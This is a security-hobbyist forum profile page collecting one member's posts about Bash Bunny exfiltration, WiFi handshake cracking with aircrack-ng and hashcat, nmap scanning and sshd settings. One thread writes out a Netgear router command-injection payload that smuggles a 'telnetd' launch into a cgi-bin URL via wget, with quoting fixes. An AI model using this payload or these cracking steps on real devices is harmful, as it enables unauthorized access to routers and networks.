anode
-
Posts
197 -
Joined
-
Last visited
-
Days Won
3
Posts posted by anode
-
-
On 2/26/2019 at 4:57 PM, Foxtrot said:
It's Plunder, not Blunder.
depends on how you use it :)
(I'm sure I can screw it up)
-
Either English is far from your first language or you are totally clueless on basic networking/TCP stack.
(I'm thinking a little from column A ,a little from column b......)
-
5 minutes ago, icarus255 said:
Ah please, I scan from my home all day, every day. If he can hack my computer from a scan, I'll give him 10 points. I'll even leave the pc running a little while longer. It's no different to him just picking a random IP address and giving it a go.
And asking security focused people.
-
7 minutes ago, icarus255 said:
And:
5222/tcp open xmpp-client?
But I am not sure what you are going to be doing with these open ports. Just because they are open doesn't mean they vulnerable but anyway keep us posted with this journey. I hope you get your income back, bro 😉
I think xmpp recently had a long running vuln discovered. (If that is what is actually running on 5222)
-
Since just a basic browse shows a blank page, how are you losing income?
Looks pretty standard: web, mail, and dns
Not shown: 65525 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
110/tcp open pop3
143/tcp open imap
443/tcp closed https
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
8000/tcp closed http-alt -
Maybe?
ping -c 1 webstite.com
If you want all the open ports
nmap -p- webstie.com
(will only do TCP ports I think -sU does the UDP)
Do keep in mind that many websites may 'share' the same IP address on shared hosting.
-
1
-
-
Look at your router/modem's WPS settings. You may need to change them, so the client can initiate the exchange.
Or, non WPS: besside-ng (from aircrack-ng) to get 4way handshake then into aircrack, JtR, hashcat, etc.
-
If I made a hidden volume inside a 'crypt container on a USB thumbdrive, how resilience is it to unplugging the drive while mounted?
I guess should also ask about full disk encryption too.
-
I'm probably going to do a bad job asking this but.....
Can one configure sshd to only connect with clients that already have the key in known_hosts?
ie: Not offer the server's public key to the client on first connection. So if the client doesn't have the server's public key, its just gets a connection refused.
This would be linux; raspbian or kali on a Pi. (server)
-
Have issues with exfil.
Copying about 450 files totaling 150MB *always* fails.
Wether by script/payload or just mass storage drag-n-drop.
When by payload it it does a self eject with the typical OS warning.
When by D-n-D, it just hangs after abut 15MB. (have to yank out)
Bunny gets rather warm too.
(Mac OSX is the host PC)
-
32 minutes ago, LowValueTarget said:
I would imagine that bash is expanding that path on the BB before it's sent as keystrokes.
Try putting your quack strings in a text file and using `QUACK keystrokes.txt`
Yup that was it. Saw another post, but it didn't sink in as to why.
Makes sense now. Thanks!
-
For some reason when I quack a ~/ it is played back as /root/
~/ works fine manually typed in a terminal
I tried a simple just quack it into text editor and same results; /root/
MAC OSX 10.9 Mavericks.
edit: Just tried on a Kali laptop same results.
Both machine bare iron, not VMs.
-
18 hours ago, CuppaTea said:
To use the battery as a failover device, and charge it when not in use, you just need a couple of diode and resister. A voltage regulator is also a good idea.
The only concern I'd have with a small battery is finding one which can provide the required power but if it's possible to find one which could be built in without making the case bigger, it would allow the Bunny to be used in plenty of other attack scenarios.
Not if lipo. They need special charging. Plenty of chips out there that do it.
-
This was one of my first thoughts.
I was thinking just a coin cell battery to boot it, then plug in/attack. Doesn't need to run it for long.
But for v2.0, how about a usb port out the back for battery, wifi, ethernet, etc? And the battery could/should be pass through.
-
On 3/1/2017 at 3:37 AM, Darren Kitchen said:
PS: How do you know when a joke becomes a dad joke?
When its pun based. :)
-
On 2/23/2017 at 6:09 PM, b0N3z said:
I don't think they are going to update aircrack until openwrt has. Also site survey, while great and easy, is not always accurate and sometimes tells you it has a handshake and when you check the handshake aircrack says no handshake. Almost better to run the commands manually.
Actually it is updated, if you use opkg. (but problem still is there) And it has a working besside-ng! Made a *very* crude/kludgey alpha module for it. (is there anything before alpha?)
-
Kinda minor, but on network page, an option to save AP names with a drop down.
And option to hide management SSID.
-
2
-
-
Been playing with Site Survey module and pop over on SSH and run
aircrack-ng <capfile> -J <hccap>
And it seems to run OK. But over on the hashcat rig (3.20 Ubuntu server 16.04.1) fails with a incorrect epol length.
Copying the cap file over the the hashcat rig and using AC (v 1.2 beta 3) there works perfectly.
The Nano's AC version is 1.2 rc2
(my kali box is 1.2 rc3, which also works)
-
I've swapped around the single double quotes in all sorts of combos.
$IFS as a shell variable. Its equated to a space. (on both systems) It works *perfectly* inside a web browser.
I'm trying to get it to work with wget or curl.
Getting telnet running on default port 23 is no prob. But would be nice to add arguments and options to do a 'killall'
(and I *do* thank you for your all your help (globally here). You're a good/helpful guy here. ...When Diginija speak, hackers listen (old US inside joke)
33 minutes ago, digininja said:I think there is a translation issue, do you mean variable?
If you do, then using single quotes means the local shell won't treat it as a variable.
-
4 minutes ago, digininja said:
What do you mean matches?
$IFS is a space on both systems.
-
Thanks!! Been messing around with quotes, and made some progress.
wget "-IP-/cgi-bin/;telnetd"This works great. But once I try to add/stack it fails.
The $IFS (space) matches on both the host and target
21 minutes ago, Jamo said:Wrapping it in single quotes might help; now shell considerest the `;` being part of the local shell command, not the wget/curl
wget 'http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS"23"'
-
Been playing with the command injection vuln on the Netgear routers. Works great from a browser.
I just have no chops with wget/curl. And would like to exploit via commandline.
I've tried:
wget http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS'23'
I've even tried lynx but no love there either.
-
*what* settings? Some may not take effect until reboot, service restart, etc.
registry is a standard place for settings.
-
Cool. So its the semi-false thick hard to bend wire claim.
Yes, 10 gauge THHN solid is stiff, but 000 welding cable is rather supple. Its not the gauge, but the number of strands (and their individual diameter) along with the insulation. (think drone/RC silicone wire)
Blunder Bug
in Questions
Posted
Might be able to use a Orange Pi, ODroid or the like with Android installed.